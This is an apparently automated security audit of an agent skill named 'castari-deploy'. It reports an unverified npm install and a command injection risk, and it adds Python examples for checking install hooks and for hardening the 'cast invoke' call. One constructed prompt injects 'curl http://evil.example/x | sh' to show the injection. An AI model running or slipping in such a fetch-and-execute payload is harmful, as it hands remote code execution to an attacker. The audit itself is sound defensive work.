castari-deploy
Warn
Audited by Gen Agent Trust Hub on Feb 21, 2026
Risk Level: MEDIUM
Findings: EXTERNAL_DOWNLOADS, COMMAND_EXECUTION
Full Analysis
- EXTERNAL_DOWNLOADS (MEDIUM): The skill instructs the agent to run npm install -g @castari/cli. The @castari organization is not on the trusted sources list, so this is an unverified dependency installation: npm runs any preinstall, install and postinstall scripts declared by the package and its dependencies with the privileges of the agent, so a compromised or malicious version could execute arbitrary code during installation.
- COMMAND_EXECUTION (LOW): In Step 6, the skill executes cast invoke <agent-slug> "<test-prompt>", where <test-prompt> is obtained via AskUserQuestion. Nothing in the skill sanitizes or escapes shell metacharacters in that value before it is interpolated into the command line, so a prompt containing characters such as " ; | or $( ) could terminate the quoted argument and run additional commands, which is a command injection surface if the prompt is attacker-controlled.
- DATA_EXFILTRATION (SAFE): The skill authenticates with cast login, which uses an external OAuth flow. It does not attempt to read sensitive local files such as SSH keys, environment variables, or AWS credentials directly.
- PROMPT_INJECTION (SAFE): No instructions were found that attempt to override the AI agent's system prompt, bypass safety filters, or extract internal configuration.
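A practical check for the EXTERNAL_DOWNLOADS finding is to inspect the package's install-time scripts before letting npm run them. The following is an added example, not code from the audited skill or from Castari: it reads package/package.json out of a tarball of the shape that npm pack produces, lists the preinstall, install and postinstall hooks, and builds an install command line that uses --ignore-scripts so the hooks can be reviewed first. The package manifests below are constructed samples, not the real @castari/cli manifest, and @example/cli is a placeholder name.

```python
import io
import json
import tarfile

# npm runs these package.json scripts when a package is installed as a
# dependency (global installs included). "prepare" is left out because it
# is not run for tarballs fetched from the registry.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_hooks(package_json_text):
    """Return {hook: command} for every install-time script in a manifest."""
    scripts = json.loads(package_json_text).get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def install_hooks_from_tarball(tgz_bytes):
    """Read package/package.json from an `npm pack`-style .tgz and list its hooks."""
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        member = tar.getmember("package/package.json")
        manifest = tar.extractfile(member).read().decode("utf-8")
    return install_hooks(manifest)


def safe_install_argv(package):
    """argv for a global install that skips lifecycle scripts entirely.
    Review the hooks reported above before deciding whether to run them."""
    return ["npm", "install", "-g", "--ignore-scripts", package]


def make_tarball(package_json):
    """Build an in-memory .tgz laid out like `npm pack` output (constructed sample)."""
    payload = json.dumps(package_json).encode("utf-8")
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("package/package.json")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


# Constructed manifests for the demonstration; not the real @castari/cli.
CLEAN_PKG = {
    "name": "@example/cli", "version": "1.0.0",
    "scripts": {"test": "node test.js"},
}
HOOKED_PKG = {
    "name": "@example/cli", "version": "1.0.0",
    "scripts": {"postinstall": "node scripts/setup.js", "test": "node test.js"},
}


if __name__ == "__main__":
    for label, pkg in (("clean", CLEAN_PKG), ("hooked", HOOKED_PKG)):
        hooks = install_hooks_from_tarball(make_tarball(pkg))
        print(f"{label}: install-time scripts = {hooks or 'none'}")
    print("install without running hooks:", " ".join(safe_install_argv("@castari/cli")))
```

Against a real package, obtain the tarball with npm pack @castari/cli (which downloads without installing) and pass its bytes to install_hooks_from_tarball; npm view @castari/cli scripts shows the same fields from the registry metadata. Remember that --ignore-scripts also suppresses hooks in transitive dependencies, so the check should be repeated on anything the package pulls in.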
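For the COMMAND_EXECUTION finding, the added example below (not part of the audited skill, and not Castari's code) shows why interpolating the prompt into a shell line is unsafe and what the hardened call looks like. It tokenizes the command line the way a POSIX shell would, without executing it, so the effect of a crafted prompt is visible offline: the naive line splits into several commands, while a shell-quoted line or a plain argv list stays a single invocation. The agent slug "demo-agent", the slug pattern, the prompts and the host evil.example are all constructed for the demonstration.

```python
import re
import shlex
import subprocess

# Constructed inputs, not taken from the audited skill. MALICIOUS_PROMPT is
# what an attacker-controlled answer to the AskUserQuestion step might hold.
AGENT_SLUG = "demo-agent"
BENIGN_PROMPT = "Summarise this quarter's numbers"
MALICIOUS_PROMPT = 'hello"; curl http://evil.example/x | sh; echo "'

# Tokens that separate simple commands in a POSIX shell line.
SHELL_OPERATORS = {";", "|", "||", "&", "&&"}
# Assumed slug format; adjust to whatever Castari actually accepts.
SLUG_RE = re.compile(r"^[a-z0-9][a-z0-9-]*$")


def naive_command(slug, prompt):
    """The pattern the finding describes: user text pasted into a shell line."""
    return f'cast invoke {slug} "{prompt}"'


def quoted_command(slug, prompt):
    """Same line, but every interpolated value is shell-quoted first."""
    return f"cast invoke {shlex.quote(slug)} {shlex.quote(prompt)}"


def shell_commands(line):
    """Split a line into the simple commands a POSIX shell would run,
    without executing anything. Returns a list of argv lists."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok in SHELL_OPERATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def safe_invoke_argv(slug, prompt):
    """Hardened form: validate the slug and pass the prompt as one argv
    element, so no shell ever parses it."""
    if not SLUG_RE.match(slug):
        raise ValueError(f"invalid agent slug: {slug!r}")
    return ["cast", "invoke", slug, prompt]


def invoke(slug, prompt):
    """Run the hardened argv with shell=False (needs the real `cast` binary)."""
    result = subprocess.run(safe_invoke_argv(slug, prompt), check=True,
                            capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    for label, line in (("naive", naive_command(AGENT_SLUG, MALICIOUS_PROMPT)),
                        ("quoted", quoted_command(AGENT_SLUG, MALICIOUS_PROMPT))):
        cmds = shell_commands(line)
        print(f"{label}: {len(cmds)} command(s) -> {cmds}")
    print("argv:", safe_invoke_argv(AGENT_SLUG, MALICIOUS_PROMPT))
```

The argv form is preferable to shlex.quote because it removes the shell from the path entirely; quoting is the fallback when the skill runner can only execute a single string. Validating the slug matters for the same reason as the prompt: it is also interpolated into the line.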
Audit Metadata